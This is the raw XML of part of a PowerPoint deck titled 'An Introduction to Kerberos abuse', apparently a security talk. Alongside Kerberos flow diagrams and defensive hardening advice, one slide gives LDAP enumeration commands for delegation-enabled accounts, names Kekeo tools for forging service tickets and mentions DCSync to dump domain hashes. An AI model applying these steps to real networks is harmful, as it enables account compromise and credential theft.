              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="3890252" y="1966409"/>
              <a:ext cx="4642500" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REQ (present TGT, request TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C248EB-F772-48F9-A5EF-1D535A53F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3652869" y="2373271"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3471894" y="2039896"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EE7E12-93E7-42DF-A80D-E4F326DBA9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3471894" y="2039896"/>
              <a:ext cx="5190242" cy="1599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C32F8D4-3E06-46E3-A23A-59F7D85C6EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4611779" y="2400062"/>
              <a:ext cx="3074839" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REP (TGS response)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E23493B-BEBF-4A24-BEF5-F87E5587F20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2398696" y="3758258"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="2398696" y="3758258"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F51800C-3F11-4E7A-AB9E-D1BE443E8827}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipV="1">
              <a:off x="2398696" y="3758258"/>
              <a:ext cx="5271247" cy="1682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FF7D9EA-F682-48C4-8EC6-D6C91D2C0991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="381265">
              <a:off x="3721427" y="4188518"/>
              <a:ext cx="2663618" cy="373170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (present TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F535996-1243-41AF-B40A-D53B0C1375C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2550054" y="4215121"/>
            <a:ext cx="5319830" cy="1599172"/>
            <a:chOff x="2550054" y="4215121"/>
            <a:chExt cx="5319830" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498F2C12-70EF-41AB-A3CB-3D3DE828EAE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipH="1">
              <a:off x="2550054" y="4215121"/>
              <a:ext cx="5190242" cy="1599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40E178-A7CA-4DBA-88B6-CFB0378EE955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="435642">
              <a:off x="2691229" y="4648010"/>
              <a:ext cx="5178655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (optional, for mutual authentication)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FFA3C7-C725-4AE1-8A4B-E07B5B8DB2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1665091" y="3677366"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5B7718-EA42-4376-952E-C9964D286EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9229180" y="1602386"/>
            <a:ext cx="0" cy="23843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FDAAE7-0E4C-4F9E-8BB3-78EC73E39D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263141" y="2039896"/>
            <a:ext cx="2332099" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optional PAC validation Request/Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B20723F-C418-437C-A4A2-1D55BF89EAD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365810" y="2484450"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E966DCA-66D2-41A9-B10F-F968237D6AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058745" y="4316606"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Arrow: Down 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3430FE93-F1E2-4C01-89BE-52ACB07A85AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258177" y="1758609"/>
            <a:ext cx="612697" cy="716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Auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4161616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EA7C-B38C-4312-A522-2FAB0B7D91DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9979CC7A-8E58-487C-BFB8-E332CEEF29A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LDAPFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:"(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=computer)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LDAPFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:"(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=person)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=user)(userAccountControl:1.2.840.113556.1.4.803:=16777216))“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Msds-allowedtodelegateto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromise those accounts…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kekeo’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> asktgt.exe or s4u.exe to get a TGS ticket for you target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(…If LDAP is allowed, you can do DCSYNC to get the domain hashes…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1438642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409C-9AD8-4AB1-9832-535AAAF24C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA06217-C665-4BF6-A7C5-8E5CA93EC62E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="617244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1DC4-9BBD-4009-AC8F-812EFBEA483C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7EBD8E-6793-4550-B582-F19E82DC7131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t user unconstrained Delegation – If a service requires delegation it should be constrained delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure administrative accounts to be “Account is sensitive and cannot be delegated” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add administrative groups to the “Protected Users” group (Denies delegation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be very careful/restrictive what you allow delegation to / for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097038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79C1-B4C9-A147-8480-73155DC97754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Any questions? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13E09D40-32D8-E647-94B3-161D2D5A389E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940843" y="2514600"/>
            <a:ext cx="4869657" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>@grimhacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>grimhacker@grimhacker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F9AE21-5C61-A745-B5B9-2610AE49AFD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4250" y1="52500" x2="54250" y2="52500"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959768" y="3095625"/>
            <a:ext cx="981075" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351716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F9562F-6AE6-4097-A51D-0A2D8C53044E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="221721"/>
            <a:ext cx="12168329" cy="6402103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282700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FFA1A3-3E8A-4B3B-84C1-75D9F08FB2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1940312" y="1425"/>
            <a:ext cx="8285356" cy="6833690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20606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3AA48C-A058-4E3F-9BC7-794DAD206CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795346" y="32666"/>
            <a:ext cx="8642669" cy="6825334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2858702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23757</TotalTime>
  <Words>7312</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>540</Paragraphs>
  <Slides>67</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Century Gothic</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>An Introduction to Kerberos abuse</vt:lpstr>
      <vt:lpstr>Part 0: Kerberos Primer</vt:lpstr>
      <vt:lpstr>Kerberos Primer</vt:lpstr>
      <vt:lpstr>Kerberos Primer</vt:lpstr>
      <vt:lpstr>Kerberos Primer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Eugh….! Boring! Get to the point!</vt:lpstr>
      <vt:lpstr>Part 1: Username Enumeration</vt:lpstr>
      <vt:lpstr>Username Enumeration</vt:lpstr>
